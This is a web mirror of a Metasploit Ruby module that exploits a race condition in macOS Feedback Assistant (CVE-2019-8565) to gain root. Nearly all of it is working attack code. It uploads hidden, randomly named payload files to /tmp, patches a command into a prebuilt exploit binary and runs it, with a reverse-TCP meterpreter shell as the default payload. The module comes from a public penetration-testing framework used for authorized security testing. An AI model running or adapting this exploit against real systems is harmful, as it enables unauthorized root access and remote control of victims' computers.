Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/osx/local/feedback_assistant_root.rb
19758 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::File

10
  include Msf::Post::OSX::Priv

11
  include Msf::Post::OSX::System

12
  include Msf::Exploit::EXE

13
  include Msf::Exploit::FileDropper

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'Mac OS X Feedback Assistant Race Condition',

20
        'Description' => %q{

21
          This module exploits a race condition vulnerability in Mac's Feedback Assistant.

22
          A successful attempt would result in remote code execution under the context of

23
          root.

24
        },

25
        'License' => MSF_LICENSE,

26
        'Author' => [

27
          'CodeColorist', # Discovery and exploit

28
          'timwr', # Metasploit module

29
        ],

30
        'References' => [

31
          ['CVE', '2019-8565'],

32
          ['URL', 'http://web.archive.org/web/20190423083938/https://medium.com/0xcc/rootpipe-reborn-part-ii-e5a1ffff6afe'],

33
          ['URL', 'https://support.apple.com/en-in/HT209600'],

34
          ['URL', 'https://github.com/ChiChou/sploits'],

35
        ],

36
        'SessionTypes' => [ 'meterpreter', 'shell' ],

37
        'Platform' => [ 'osx', 'python', 'unix' ],

38
        'DefaultTarget' => 0,

39
        'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' },

40
        'Targets' => [

41
          [ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],

42
          [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],

43
          [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],

44
        ],

45
        'DisclosureDate' => '2019-04-13',

46
        'Notes' => {

47
          'Reliability' => UNKNOWN_RELIABILITY,

48
          'Stability' => UNKNOWN_STABILITY,

49
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

50
        }

51
      )

52
    )

53
    register_advanced_options [

54
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])

55
    ]

56
  end

57


58
  def upload_executable_file(filepath, filedata)

59
    print_status("Uploading file: '#{filepath}'")

60
    write_file(filepath, filedata)

61
    chmod(filepath)

62
    register_file_for_cleanup(filepath)

63
  end

64


65
  def check

66
    version = get_system_version

67


68
    return CheckCode::Unknown('Could not retrieve OSX version') if version.blank?

69


70
    version = Rex::Version.new(version)

71


72
    if version >= Rex::Version.new('10.14.4')

73
      return CheckCode::Safe("OSX version #{version} is not vulnerable.")

74
    end

75


76
    CheckCode::Appears("OSX version #{version} appears vulnerable.")

77
  end

78


79
  def exploit

80
    if check != CheckCode::Appears

81
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'

82
    end

83


84
    if is_root?

85
      fail_with Failure::BadConfig, 'Session already has root privileges'

86
    end

87


88
    unless writable? datastore['WritableDir']

89
      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"

90
    end

91


92
    case target['Arch']

93
    when ARCH_X64

94
      payload_file = "#{datastore['WritableDir']}/.#{Rex::Text::rand_text_alpha_lower(6..12)}"

95
      binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)

96
      upload_executable_file(payload_file, binary_payload)

97
      root_cmd = payload_file

98
    when ARCH_PYTHON

99
      root_cmd = "echo \"#{payload.encoded}\" | python"

100
    else

101
      root_cmd = payload.encoded

102
    end

103
    root_cmd = root_cmd + " & \0"

104
    if root_cmd.length > 1024

105
      fail_with Failure::PayloadFailed, "Payload size (#{root_cmd.length}) exceeds space in payload placeholder"

106
    end

107


108
    exploit_data = File.binread(File.join(Msf::Config.data_directory, "exploits", "CVE-2019-8565", "exploit"))

109
    placeholder_index = exploit_data.index('ROOT_PAYLOAD_PLACEHOLDER')

110
    exploit_data[placeholder_index, root_cmd.length] = root_cmd

111


112
    exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text::rand_text_alpha_lower(6..12)}"

113
    upload_executable_file(exploit_file, exploit_data)

114


115
    print_status("Executing exploit '#{exploit_file}'")

116
    result = cmd_exec(exploit_file)

117
    print_status("Exploit result:\n#{result}")

118
  end

119
end

120


121